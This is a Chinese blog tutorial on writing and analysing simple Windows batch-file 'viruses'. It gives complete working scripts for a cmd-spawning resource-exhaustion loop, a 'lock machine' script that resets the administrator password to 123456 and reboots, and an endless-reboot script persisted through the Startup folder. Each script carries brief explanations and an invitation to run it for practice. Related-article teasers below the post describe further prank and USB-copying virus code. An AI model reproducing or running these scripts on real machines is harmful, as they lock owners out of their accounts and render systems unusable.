简单windows病毒编写及分析

最新推荐文章于 2025-03-24 17:25:17 发布
最新推荐文章于 2025-03-24 17:25:17 发布
阅读量1.6k 收藏 14
点赞数 18
分类专栏: 网络安全Web基础 文章标签: windows 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zakefine/article/details/143812932
版权

声明:本文仅用于合法范围的学习交流,若使用者将本文用于非法目的或违反相关法律法规的行为,一切责任由使用者自行承担。请遵守相关法律法规。

一、编写一个简单的cmd程序

1、资源耗尽病毒

echo start cmd >1.txt
echo %0 >>1.txt
ren 1.txt 1.bat

启动效果

二、病毒分析

1、锁机病毒

(1)源代码

echo net user administrator 123456 > c:\windows\Temp\1.bat
echo shutdown /r /t 0 >> c:\windows\Temp\1.bat

(2)代码分析

1、echo net user administrator 123456 > c:\windows\Temp\1.bat
分析:
将net user administrator 123456写入文件1.bat
net user administrator 123456创建管理员用户administrator和密码123456;
2、echo shutdown /r /t 0 >> c:\windows\Temp\1.bat
分析:
将shutdown /r /t 0写入1.bat,shutdown /r /t 0表示直接重启主机
3、预期结果:
将administrator密码改为123456并重启
4、效果验证

2、无限重启病毒分析

(1)源代码

echo shutdown /r /t 0 > C:\windows\Temp\1.bat
copy C:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

(2)代码分析

1、echo shutdown /r /t 0 > C:\windows\Temp\1.bat
分析:
将shutdown /r /t 0写入1.bat,shutdown /r /t 0表示直接重启主机
2、copy C:\windows\Temp\1.bat “%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup”
将1.bat复制到windows自启目录
3、效果分析
每次重启后执行1.bat导致反复重启

三、总结

文件要能看懂源码,并进行实际操作,这样才能加深印象。

[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
世界上最简单病毒(bat)
2302_76672693的博客
10-25 2838
世界上最简单病毒(bat)
分享一些无害可以装13的小病毒
Sunny40的博客
08-12 3804
我在电脑找到自己搞得小病毒,我写的是一些无害的小病毒,那么就来给大家们来分享一下一些病毒代码,而且解除也非常简单!效果是打开后会运行cmd,运行到你重启或注销登录为止,但你可以一直按Alt+F4等到关闭完毕这些程序,当然你别想直接打开任务管理器关闭了,因为它会阻挡或关闭的。这时候我的电脑会显示即将关闭你的电脑,我就不知道你们了,如果你们和我一样的话那你就:win+r输入cmd,在这里输入命令shutdown -a就好了!最后提醒一下:如果你是电脑新手,并且记忆力不好,那么你就重启,那么就再买一台吧。 没经验
Python 简单病毒程序合集(一)
最新发布
小蜗牛的珍贵百宝箱
03-24 1061
本篇文章将介绍一些用 Python 编写简单病毒程序。请注意,这些程序仅用于学习目的,目的是帮助你了解病毒是如何工作的,并加深对 Python 编程的理解。我们强烈建议你仅在合法和道德的框架下使用这些代码,并且不要将它们用于任何形式的恶意活动。
电脑病毒史上的八大经典
yykYYK2010的博客
07-27 2130
和之前的电脑病毒不同,“超级病毒(Stuxnet)”是第一款以工业基础设施为攻击对象的网络蠕虫病毒,通过利用西门子公司控制系统(SIMATICWinCC/Step7)存在的漏洞,感染数据采集与监控系统(SCADA),并向可编程逻辑控制器(PLCs)写入代码,以达到破坏的目的。当然黑客的这番恐吓也并非空穴来风,正如它的名字一样,WannaCry在感染目标机后会自动加密硬盘上的所有文件,几乎涵盖日常所能用到的所有格式:文档、图片、影音、视频,有种让人想哭的感觉。提到病毒,首屈一指的莫过于当年的CIH了。
python简单病毒编程代码,如何用python做恶搞病毒
2301_81900439的博客
03-12 845
如果目标U盘中有很多电影,音乐,这些我们并不需要的文件,我们的程序就应该能跳过它们,仅仅选择一些重要的比如.docx比如.ppt文件,或者仅仅复制最近修改过的那些文件,或者排除所有大小大于5M的文件。首先我们打开电脑终端,进入/Volumes目录,这时候插入U盘,可以发现它被挂载在了这个目录之下,也就是说,我们只要在固定时间扫描这个目录,当这个目录有新文件夹出现的时候,很可能有U盘被插入了。好了,我们现在需要递归usb文件夹,找到所有的file,查看大小,如果小于,比如3M,就拷贝进home,大于就舍去。
简单计算机电脑病毒实验,简单的电脑病毒程序
weixin_39936310的博客
07-29 1718
有些网友想了解一下简单的电脑病毒是如何制作的。所以今天学习啦小编要跟大家介绍下简单的电脑病毒程序,下面就是学习啦小编为大家整理到的资料,请大家认真看看!简单的电脑病毒程序一:@echo offecho exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nulchcp 437&gt...
一个简单实用的病毒小代码1(对电脑无害)
cc_14的博客
07-17 3024
建议发给你最好的朋友,有助于促进友谊。破解方法:等待一分钟,电脑会自动重启。
C语言写的简单病毒程序
Mobidogs Blog
03-04 5423
<!--google_ad_client = "pub-3555979289815451";google_ad_width = 468;google_ad_height = 60;google_ad_format = "468x60_as";google_ad_type = "image";//2007-03-07: devx.blog.com.cngoogle_ad_
用C语言编写简单病毒
zhuqing_739的专栏
04-03 2万+
<br /> [摘要]在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.<br /> [Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.一、什么是病毒    <br />    恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是很重要的.<br />    我们要对
C简单病毒程序
http://www.softwareace.cn 王牌软件
07-27 913
病毒的特点:  病毒的最大特点就是自我复制,从病毒的分类来说有很多种,这里我们将介绍最流行的附加式  病毒,它通过对正常的文件进行改写,增加来实现其自我复制的目的。  从程序的角度来说,我们要做的事情有两件:  1,让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序,
关于计算机病毒的代码,常用的电脑病毒代码
weixin_39953629的博客
07-12 8012
该楼层疑似违规已被系统折叠隐藏此楼查看此楼on error resume nextset fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置set dir2=fs.getspecialfold...
Popup-Virus:用Java编写简单弹出式病毒
05-02
【标题】:“Popup-Virus:用Java编写简单弹出式病毒” 在计算机科学和网络安全领域,"Popup-Virus"是一种特殊类型的恶意软件,它利用Java编程语言来创建。Java由于其跨平台的特性,被广泛应用于各种系统,这也...
Windows 基础 (三):常用CMD命令详解及病毒编写
vortex5的博客
11-02 1478
本文主要介绍常用的CMD命令,以及通过这些命令如何编写简单批处理(BAT)脚本病毒。这些脚本的作用是通过模拟消耗系统资源、篡改系统配置等方式,产生类似DOS(Denial of Service)攻击的效果。本文仅供学习与研究之用,请勿用于非法用途。本文首先介绍了常用的DOS命令,然后介绍了几种基于批处理脚本的 DOS 攻击方法,包括资源耗尽、锁机、无限重启等。利用这些方法,攻击者可以通过简单的脚本对系统资源造成大量消耗,破坏系统稳定性和可用性。免责声明。
Win32汇编病毒编写教程:分析与实践
病毒程序汇编分析指南,专注于使用Windows 32位汇编语言来解析和理解病毒代码。这份教程不仅介绍了如何通过PE文件结构编写简单的类似于病毒的程序,而且提供了一种深入学习恶意软件行为的方式。作者并不承担因不当...
[系统安全] 七.逆向分析之PE病毒原理、C++实现文件加解密及OllyDbg逆向
杨秀璋的专栏
12-26 6418
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了条件语句和循环语句源码还原及流程控制逆向。这篇文章将分享勒索病毒,通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程;第二部分详细讲解了OllyDbg和在线沙箱的逆向分析过程。希望对入门的同学有帮助。
python简单病毒编程代码,如何用python写一个病毒
小发猫
07-31 5138
大家好,本文将围绕python简单病毒编程代码展开说明,如何用python做恶搞病毒是一个很多人都想弄明白的事情,想搞清楚如何用python写一个病毒需要先了解以下几个事情。
C语言编写简易病毒
热门推荐
Ray的博客
09-01 7万+
本次实验设计的是一个基于C语言的恶意代码,其执行流程如下: 1、 在病毒第一次执行时,即检测到注册表的任务管理器没有被禁用,则病毒依次执行以下功能: 创建开机启动项,在系统目录路径下面复制文件,将其作为自启动路径; 禁用任务管理器; 禁用注册表编辑器; 联网获取图片并修改桌面背景(重启生效); 修改注册表屏蔽用户键盘输入为1(重启生效); 删除驱动器盘符,使桌面以及开始菜单快捷方式失
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值